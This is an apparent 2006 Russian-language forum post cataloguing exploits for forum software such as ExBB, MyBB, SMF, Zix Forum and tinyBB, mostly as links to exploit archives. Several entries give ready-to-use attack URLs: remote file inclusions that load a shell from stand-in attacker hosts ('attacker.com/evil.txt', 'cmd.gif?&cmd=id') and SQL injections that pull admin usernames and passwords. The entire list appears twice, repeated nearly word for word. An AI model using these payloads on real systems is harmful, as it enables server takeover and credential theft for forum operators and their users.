gemaglabin
30.08.2006, 04:38
ExBB
Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php
Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell
MercuryBoard <= 1.1.4
Отсутсвующая проверка поля USER-AGENT привела к sql иньекции
Эксплоит : http://milw0rm.com/exploits/2247
VistaBB <= 2.x
Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе
Позволяет выполнять произвольные команды
Эксплоит : http://milw0rm.com/exploits/2251
Simple Machines Forum
1.Simple Machines Forum <= 1.1
Ошибка в скрипте регистрации,позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/2231
2.Simple Machines Forum <= 1.3.1.3
Уязвимость в компоненте-надстройки форума SMF над MamboCMS
http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts][/color]
Woltlab Burning Board 2.3.5
Баг в модуле links.php приводит к выполнению произвольных sql-запросов
Эксплоит : http://milw0rm.com/exploits/2197
Эксплоит : http://milw0rm.com/exploits/1810
MiniBB <=1.5
Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину
Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
MyBB
1.MyBB <= 1.1.5
Недостаточная обработка поля CLIENT-IP позволяет создать юзера с привеллегиями администратора
Эксплоит : http://milw0rm.com/exploits/2012
2.MyBB <= 1.1.3
Уязвимость в скрипте member.php приводит к созданию нового администратора форума
Эксплоит : http://milw0rm.com/exploits/1950
3.MyBB < 1.1.3
Эксплоит позволяет выполнять произвольные команды на сервера
Эксплоит :http://milw0rm.com/exploits/1909
PHORUM 5
Эксплоит работает с register_globals=On и magic_quotes_gpc=Off
Эксплоит : http://milw0rm.com/exploits/2008
UBB Threads
1.UBBThreads 5.x,6.x
Работает с register_globals on
Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере
2.UBB.threads >= 6.4.x
Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего
Эксплоит : /addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
Zix Forum
Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj
Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1, J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogi ns where approve=1 and '1'='1'
Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1 ,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,nul l,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adm inLogins where approve=1 and '1'='1'
qjForum
Недостаточная обработка поля "uName" в скрипте 'member.php'
Для выполнения эксплоита надо залогиниться на форум
Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username, 0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20memb er
tinyBB <= 0.3
Ошибка в скрипте 'footers.php',позволяющая залить шелл
Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
FunkBoard
Уязвимост в скрипте profile.php позволяет сменить пасс выбранного юзера
Эксплоит : http://milw0rm.com/exploits/1875
QBoard <= v.1.1
Ошибка в скрипте 'post.php',позволяющая залить шелл
Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts]
FlashBB <= 1.1.5
Ошибка в скрипте 'getmsg.php',позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/1921
LiteForum 2.1.1
Эксплоит-переборщик хеша пароля
Эксплоит : http://rst.void.ru/download/r57lite211.txt
Forum Russian Board 4.2
Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php'
Эксплоит : http://rst.void.ru/download/r57frb.txt
OpenBB 1.0.5
SQL-иньекция через нефильтруемый параметр CID
Эксплоит : http://rst.void.ru/download/r57openbb.txt
Gravity Board X v1.1
Выполнение произвольных команд через уязвимый скрипт 'editcss.php'
Эксплоит : http://rst.void.ru/download/r57gravity.txt
Zorum forum
Выполнение SQL-иньекции через нефильтруемый параметр 'rollid'
Эксплоит : http://rst.void.ru/download/r57zor.txt
Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php
Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell
MercuryBoard <= 1.1.4
Отсутсвующая проверка поля USER-AGENT привела к sql иньекции
Эксплоит : http://milw0rm.com/exploits/2247
VistaBB <= 2.x
Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе
Позволяет выполнять произвольные команды
Эксплоит : http://milw0rm.com/exploits/2251
Simple Machines Forum
1.Simple Machines Forum <= 1.1
Ошибка в скрипте регистрации,позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/2231
2.Simple Machines Forum <= 1.3.1.3
Уязвимость в компоненте-надстройки форума SMF над MamboCMS
http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts][/color]
Woltlab Burning Board 2.3.5
Баг в модуле links.php приводит к выполнению произвольных sql-запросов
Эксплоит : http://milw0rm.com/exploits/2197
Эксплоит : http://milw0rm.com/exploits/1810
MiniBB <=1.5
Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину
Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
MyBB
1.MyBB <= 1.1.5
Недостаточная обработка поля CLIENT-IP позволяет создать юзера с привеллегиями администратора
Эксплоит : http://milw0rm.com/exploits/2012
2.MyBB <= 1.1.3
Уязвимость в скрипте member.php приводит к созданию нового администратора форума
Эксплоит : http://milw0rm.com/exploits/1950
3.MyBB < 1.1.3
Эксплоит позволяет выполнять произвольные команды на сервера
Эксплоит :http://milw0rm.com/exploits/1909
PHORUM 5
Эксплоит работает с register_globals=On и magic_quotes_gpc=Off
Эксплоит : http://milw0rm.com/exploits/2008
UBB Threads
1.UBBThreads 5.x,6.x
Работает с register_globals on
Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере
2.UBB.threads >= 6.4.x
Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего
Эксплоит : /addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
Zix Forum
Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj
Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1, J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogi ns where approve=1 and '1'='1'
Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1 ,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,nul l,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adm inLogins where approve=1 and '1'='1'
qjForum
Недостаточная обработка поля "uName" в скрипте 'member.php'
Для выполнения эксплоита надо залогиниться на форум
Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username, 0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20memb er
tinyBB <= 0.3
Ошибка в скрипте 'footers.php',позволяющая залить шелл
Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
FunkBoard
Уязвимост в скрипте profile.php позволяет сменить пасс выбранного юзера
Эксплоит : http://milw0rm.com/exploits/1875
QBoard <= v.1.1
Ошибка в скрипте 'post.php',позволяющая залить шелл
Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts]
FlashBB <= 1.1.5
Ошибка в скрипте 'getmsg.php',позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/1921
LiteForum 2.1.1
Эксплоит-переборщик хеша пароля
Эксплоит : http://rst.void.ru/download/r57lite211.txt
Forum Russian Board 4.2
Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php'
Эксплоит : http://rst.void.ru/download/r57frb.txt
OpenBB 1.0.5
SQL-иньекция через нефильтруемый параметр CID
Эксплоит : http://rst.void.ru/download/r57openbb.txt
Gravity Board X v1.1
Выполнение произвольных команд через уязвимый скрипт 'editcss.php'
Эксплоит : http://rst.void.ru/download/r57gravity.txt
Zorum forum
Выполнение SQL-иньекции через нефильтруемый параметр 'rollid'
Эксплоит : http://rst.void.ru/download/r57zor.txt